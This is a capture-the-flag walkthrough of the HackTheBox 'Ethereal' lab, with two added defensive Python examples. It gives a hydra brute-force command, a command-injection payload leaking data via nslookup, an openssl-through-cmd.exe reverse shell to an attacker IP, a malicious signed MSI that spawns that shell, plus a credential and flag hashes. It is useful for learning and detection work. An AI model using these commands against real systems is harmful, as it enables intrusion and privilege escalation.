Untitled

a guest
Nov 18th, 2018
DOWNLOAD EVERYTHING FROM FTP SERVER
binary
mget FDISK.zip
mget DISK1
mget DISK2
etcetera

RUN PBOX
MOUNT FDISK
mkdir ./mnt && mkdir ./mnt/FDISK && mount -o loop FDISK ./mnt/FDISK

apt-get install dosbox
GET REQUIRED CWSDPMI FILE
https://www.dosgames.com/files/cwsdpmi.zip
dosbox cwsdpmi.exe
cd to /pbox folder
enter command pbox
enter password password

USE PASSWORD LIST TO BRUTE LOGIN ON 8080
hydra -L pbox_credentials.txt -P pbox_credentials.txt http-get://ethereal.htb:8080
username alan
password !C414m17y57r1k3s4g41n!

EDIT /etc/hosts to include
10.10.10.106 ETHEREAL.HTB
http://10.10.10.106:8080
Log in using above credentials

CHECK FOR RCE
commix --batch --retries=9999 --all --os='Windows' --auth-type=basic --auth-cred='alan:!C414m17y57r1k3s4g41n!' --data="__EVENTVALIDATION=/wEdAAPXNrMskvPvtGY7odd1gNQQ4CgZUgk3s462EToPmqUw3OKvLNdlnDJuHW3p%2B9jPAN/80m0Jg7tyLIuniHLLNMkjX2uEzelj9mmG0qvEBTnS/w==&search=localhost&ctl02=" -p "search" --level=3 -u http://ethereal.htb:8080/?guest=1

CATCH PACKETS WITH WIRESHARK
In ping box enter
|| for /f "tokens=1" %i in ('whoami') do nslookup %i 10.10.14.15
This is a blind RCE

CHECK FIREWALL RULES
netsh advfirewall firewall show rule name=all
ports 73 and 136 are open
openssl.exe is installed

CREATE A KEY
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes

COMMAND SENDER TERMINAL WINDOW
openssl s_server -quiet -key key.pem -cert cert.pem -port 73

COMMAND RESPONSE TERMINAL WINDOW
openssl s_server -quiet -key key.pem -cert cert.pem -port 136

USE PING IN WEB APP OR EXECUTE CURL COMMAND TO RUN THE POST OF THIS COMMAND THROUGH ADMIN WEBAPP
10.10.14.15 | C:\Progra~2\OpenSSL-v1.1.0\bin\openssl.exe s_client -quiet -connect 10.10.14.15:73 | cmd.exe | C:\Progra~2\OpenSSL-v1.1.0\bin\openssl.exe s_client -quiet -connect 10.10.14.6:136

SEND COMMANDS in SEND TERMINAL
USE CURL IN 3RD TERMINAL
SEE RESPONSE IN 2ND TERMINAL
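The relay above never touches nc, powershell or a dropped binary: it chains the host's own openssl.exe into cmd.exe on two firewall-permitted ports, so detections keyed on the usual reverse-shell tooling miss it. From the defender's side the tell is in the process command line. The following is an added example (not part of the original notes) of a small process-creation log rule that flags openssl s_client piped through a shell, s_client output redirected into a file (the LNK and MSI drops later in the notes), and s_client connections to ports where no TLS service normally listens. The sample events, PIDs, user names and the expected-port list are constructed for the example; the command lines are modelled on the ones in the notes.

```python
import re
from dataclasses import dataclass

# Constructed process-creation events (simplified Sysmon Event ID 1 fields).
# The command lines are modelled on the relay and file-drop one-liners in the notes;
# the PIDs and user names are made up for this example.
SAMPLE_EVENTS = [
    {"pid": 4412, "user": "ETHEREAL\\alan",
     "cmdline": r"cmd.exe /c C:\Progra~2\OpenSSL-v1.1.0\bin\openssl.exe s_client -quiet -connect 10.10.14.15:73 | cmd.exe | C:\Progra~2\OpenSSL-v1.1.0\bin\openssl.exe s_client -quiet -connect 10.10.14.15:136"},
    {"pid": 4420, "user": "ETHEREAL\\svc_update",
     "cmdline": r"openssl.exe s_client -connect updates.example.test:443 -servername updates.example.test"},
    {"pid": 4433, "user": "ETHEREAL\\alan",
     "cmdline": r"cmd.exe /c C:\Progra~2\OpenSSL-v1.1.0\bin\openssl.exe s_client -quiet -connect 10.10.14.15:73 > C:\Users\Public\Desktop\Shortcuts\VB.lnk"},
    {"pid": 4501, "user": "ETHEREAL\\alan", "cmdline": r"cmd.exe /c echo hello"},
]

S_CLIENT_RE = re.compile(r"\bs_client\b", re.I)
# '-connect host:port' belonging to one s_client stage (stop at '|' or '>' so we never cross stages)
CONNECT_RE = re.compile(r"\bs_client\b[^|>]*?-connect\s+(?P<host>[^\s:]+):(?P<port>\d+)", re.I)
# A pipeline stage that is just a shell, e.g. the bare 'cmd.exe' between two openssl stages
SHELL_STAGE_RE = re.compile(r'^"?(?:[^"\s]*\\)?(?:cmd|powershell|pwsh)(?:\.exe)?"?(?:\s|$)', re.I)
# Leading 'cmd.exe /c ' wrapper; stripped before the stages are examined
WRAPPER_RE = re.compile(r'^\s*"?(?:[^"\s]*\\)?cmd(?:\.exe)?"?\s+/[ck]\s+', re.I)
# Ports on which an outbound openssl s_client is unremarkable (constructed allow-list)
EXPECTED_TLS_PORTS = {443, 465, 587, 636, 853, 993, 995, 8443}


@dataclass
class Finding:
    pid: int
    rule: str
    remotes: tuple  # (host, port) pairs taken from the -connect arguments


def pipeline_stages(cmdline: str) -> list:
    """Split a command line into its '|' stages (naive: ignores pipes inside quotes)."""
    body = WRAPPER_RE.sub("", cmdline)
    return [s.strip() for s in body.split("|") if s.strip()]


def analyze(event: dict) -> list:
    """Return the Findings raised by one process-creation event."""
    cmd = event["cmdline"]
    findings = []
    if not S_CLIENT_RE.search(cmd):
        return findings
    remotes = tuple((m.group("host"), int(m.group("port"))) for m in CONNECT_RE.finditer(cmd))
    stages = pipeline_stages(cmd)
    has_shell_stage = any(SHELL_STAGE_RE.match(s) for s in stages)
    has_client_stage = any(S_CLIENT_RE.search(s) for s in stages)
    # Rule 1: s_client output fed through a shell stage = interactive command relay over TLS
    if has_shell_stage and has_client_stage:
        findings.append(Finding(event["pid"], "openssl_s_client_shell_relay", remotes))
    # Rule 2: s_client stdout redirected into a file = file transfer over TLS (LNK/MSI drops)
    if re.search(r"\bs_client\b[^|]*>\s*\S", cmd, re.I):
        findings.append(Finding(event["pid"], "openssl_s_client_file_write", remotes))
    # Rule 3: TLS client to a port where no TLS service normally listens (73 and 136 here)
    odd = tuple(r for r in remotes if r[1] not in EXPECTED_TLS_PORTS)
    if odd:
        findings.append(Finding(event["pid"], "openssl_s_client_nonstandard_port", odd))
    return findings


def scan(events: list) -> dict:
    """Map pid -> list of rule names for every event that raised at least one finding."""
    out = {}
    for ev in events:
        hits = analyze(ev)
        if hits:
            out[ev["pid"]] = [f.rule for f in hits]
    return out


if __name__ == "__main__":
    for pid, rules in scan(SAMPLE_EVENTS).items():
        print(pid, ", ".join(rules))
```

Rule 3 on its own is noisy on hosts that legitimately run openssl, which is why the relay and file-write rules key on pipeline shape rather than on the port; the port check is there to make the two odd inbound-allowed ports from the firewall step visible in the same alert.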

ENUMERATE THIS FILE
C:\Users\Public\Desktop\note-draft.txt
I've created a shortcut for VS on the Public Desktop to ensure we use the same
version. Please delete any existing shortcuts and use this one instead.
- Alan

FILES CAN BE WRITTEN HERE
C:\Users\Public\Desktop\Shortcuts\VB.lnk

UPLOAD FILES USING
openssl s_server -quiet -key key.pem -cert cert.pem -port 73 < VB.lnk

10.10.14.15 | C:\Progra~2\OpenSSL-v1.1.0\bin\openssl.exe s_client -quiet -connect 10.10.14.15:73 > C:\Users\Public\Desktop\Shortcuts\VB.lnk

USE LNKUP TO GENERATE A .lnk FILE
https://github.com/Plazmaz/LNKUp

C:\Users\jorge\Desktop\cat user.txt
2b9a4ca09408b4a39d87cbcd7bd524dd

cat D:\DEV\MSIs\note.txt
Tells us to create a malicious msi file

USE WIX TOOLSET
http://wixtoolset.org/releases/

<?xml version="1.0"?>
<Wix xmlns="http://schemas.microsoft.com/wix/2006/wi">
  <Product Id="*" UpgradeCode="12345678-1234-1234-1234-111111111111" Name="Example Product Name" Version="0.0.1" Manufacturer="@_xpn_" Language="1033">
    <Package InstallerVersion="200" Compressed="yes" Comments="Windows Installer Package"/>
    <Media Id="1" Cabinet="product.cab" EmbedCab="yes"/>
    <Directory Id="TARGETDIR" Name="SourceDir">
      <Directory Id="ProgramFilesFolder">
        <Directory Id="INSTALLLOCATION" Name="Example">
          <Component Id="ApplicationFiles" Guid="12345678-1234-1234-1234-222222222222">
            <File Id="ApplicationFile1" Source="D:\Windows\tracing\test.txt"/>
          </Component>
        </Directory>
      </Directory>
    </Directory>
    <Feature Id="DefaultFeature" Level="1">
      <ComponentRef Id="ApplicationFiles"/>
    </Feature>
    <CustomAction Id="SystemShell" Directory="TARGETDIR" ExeCommand="cmd.exe /c C:\Progra~2\OpenSSL-v1.1.0\bin\openssl.exe s_client -quiet -connect 10.10.14.6:73| cmd.exe | C:\Progra~2\OpenSSL-v1.1.0\bin\openssl.exe s_client -quiet -connect 10.10.14.6:136" Execute="deferred" Impersonate="yes" Return="ignore"/>
    <CustomAction Id="FailInstall" Execute="deferred" Script="vbscript" Return="check">
      invalid vbs to fail install
    </CustomAction>
    <InstallExecuteSequence>
      <Custom Action="SystemShell" After="InstallInitialize"></Custom>
      <Custom Action="FailInstall" Before="InstallFiles"></Custom>
    </InstallExecuteSequence>
  </Product>
</Wix>
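The whole privilege step rests on someone "testing" any .msi that lands in a shared folder, which is the same trust gap a build or release pipeline has when it signs installers nobody has read. Everything that makes the package above dangerous is visible in its WiX source: a CustomAction whose ExeCommand spawns a shell and a network client, a deferred action, failures explicitly ignored, an inline script action, and a File Source pointing outside the build tree. The following is an added example (not part of the original notes, and not WiX Toolset code) of a pre-signing audit that parses a WiX source and reports those constructs. The embedded WiX sample is constructed for the example: its GUIDs and the 203.0.113.5 host are placeholders, and its SystemShell action sets Impersonate="no" (the notes' version uses "yes", which runs the action as the user performing the install) so that the SYSTEM-context rule is exercised as well.

```python
import re
import xml.etree.ElementTree as ET

WIX_NS = "{http://schemas.microsoft.com/wix/2006/wi}"

# ExeCommand content that names a shell, a script host or a network client
RISKY_EXE_RE = re.compile(
    r"\b(?:cmd|powershell|pwsh|wscript|cscript|mshta|certutil|bitsadmin|curl)(?:\.exe)?\b"
    r"|\bs_client\b|-connect\b", re.I)
# Absolute (drive-letter or UNC) Source paths pull files from outside the build tree
ABSOLUTE_PATH_RE = re.compile(r"^(?:[A-Za-z]:\\|\\\\)")

# Constructed WiX source for this example; GUIDs and the 203.0.113.5 host are placeholders.
SAMPLE_WIX = """<?xml version="1.0"?>
<Wix xmlns="http://schemas.microsoft.com/wix/2006/wi">
  <Product Id="*" UpgradeCode="00000000-0000-0000-0000-000000000001" Name="Example Product"
           Version="0.0.1" Manufacturer="constructed" Language="1033">
    <Package InstallerVersion="200" Compressed="yes" Comments="constructed sample"/>
    <Media Id="1" Cabinet="product.cab" EmbedCab="yes"/>
    <Directory Id="TARGETDIR" Name="SourceDir">
      <Directory Id="ProgramFilesFolder">
        <Directory Id="INSTALLLOCATION" Name="Example">
          <Component Id="ApplicationFiles" Guid="00000000-0000-0000-0000-000000000002">
            <File Id="ApplicationFile1" Source="C:\\Windows\\tracing\\test.txt"/>
            <File Id="ApplicationFile2" Source="bin\\app.exe"/>
          </Component>
        </Directory>
      </Directory>
    </Directory>
    <Feature Id="DefaultFeature" Level="1"><ComponentRef Id="ApplicationFiles"/></Feature>
    <CustomAction Id="SystemShell" Directory="TARGETDIR"
        ExeCommand="cmd.exe /c openssl.exe s_client -quiet -connect 203.0.113.5:73 | cmd.exe"
        Execute="deferred" Impersonate="no" Return="ignore"/>
    <CustomAction Id="FailInstall" Execute="deferred" Script="vbscript" Return="check">
      not valid vbs
    </CustomAction>
    <CustomAction Id="LaunchApp" FileKey="ApplicationFile2" ExeCommand="/firstrun" Return="asyncNoWait"/>
    <InstallExecuteSequence>
      <Custom Action="SystemShell" After="InstallInitialize"></Custom>
      <Custom Action="FailInstall" Before="InstallFiles"></Custom>
    </InstallExecuteSequence>
  </Product>
</Wix>
"""


def audit_wix(xml_text: str) -> list:
    """Return (element Id, rule, detail) triples for risky constructs in a WiX source."""
    root = ET.fromstring(xml_text)
    findings = []
    # Only actions referenced from a sequence table actually run during install
    scheduled = {c.get("Action") for c in root.iter(WIX_NS + "Custom")}
    for ca in root.iter(WIX_NS + "CustomAction"):
        cid = ca.get("Id", "?")
        exe = ca.get("ExeCommand", "")
        if exe and RISKY_EXE_RE.search(exe):
            findings.append((cid, "shell_or_network_in_exe_command", exe))
        if ca.get("Script"):
            # Script actions carry their code inside the MSI; nothing on disk to scan later
            findings.append((cid, "inline_script_custom_action", ca.get("Script")))
        if ca.get("Execute") == "deferred" and ca.get("Impersonate", "yes") == "no":
            # Deferred + no impersonation runs in the installer service's SYSTEM context
            findings.append((cid, "deferred_no_impersonate_runs_as_system", cid))
        if cid in scheduled and ca.get("Return") == "ignore":
            # The install proceeds whatever the command did; classic for side-effect actions
            findings.append((cid, "scheduled_action_failures_ignored", cid))
    for f in root.iter(WIX_NS + "File"):
        src = f.get("Source", "")
        if ABSOLUTE_PATH_RE.match(src):
            findings.append((f.get("Id", "?"), "absolute_source_path", src))
    return findings


def rules_by_id(xml_text: str) -> dict:
    """Condense audit output to {element Id: [rule, ...]} for quick gating decisions."""
    out = {}
    for eid, rule, _detail in audit_wix(xml_text):
        out.setdefault(eid, []).append(rule)
    return out


if __name__ == "__main__":
    for eid, rule, detail in audit_wix(SAMPLE_WIX):
        print(f"{eid:18} {rule:40} {detail}")
```

Run as a gate before candle/light output reaches signtool: any finding on a scheduled CustomAction should block signing until a human has read the action, since a valid signature from the organisation's own CA is exactly what turns a package like this into something a tester will run.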

USE CANDLE.EXE WITH THE EXPLOIT ABOVE
then light.exe payload.wixobj which creates the compiled payload.msi
Download the certs rupal mentioned in his note and sign the malicious .msi
The certs were in the D:\certs folder, MyCA.cer and MyCA.pvk
pvk2pfx -pvk C:\temp\MyCa.pvk -spc C:\temp\MyCa.cer -pfx C:\temp\MyCa.pfx

CREATES NEW CERTS FOR SIGNING
makecert -pe -n "CN=My SPC" -a sha256 -cy end -sky signature -ic C:\temp\MyCA.cer -iv c:\temp\MyCA.pvk -sv C:\temp\MySPC.pvk c:\temp\MySPC.cer

CREATES OWN PFX CERT
pvk2pfx -pvk C:\temp\MySPC.pvk -spc C:\temp\MySPC.cer -pfx C:\temp\MySPC.pfx

SIGN THE PAYLOAD
signtool sign /v /n "Me" /s SPC C:\file.msi

Uploaded payload msi to C:\windows\tracing
Copy to D:\DEV\MSIs folder as needed.
When an msi file is uploaded to the D:\DEV\MSIs folder, every few minutes rupal "tests" the file and then deletes all msi files in D:\DEV\MSIs.
As soon as the msi file is copied with the openssl command, quickly exit out of the openssl connection as jorge.
Enter the openssl command to wait for a connection again on port 73 and then type or paste in a command to be run as rupal.

type C:\Users\rupal\Desktop\root.txt
root.txt
1cb6f1fc220e3f2fcc0e3cd8e2d9906f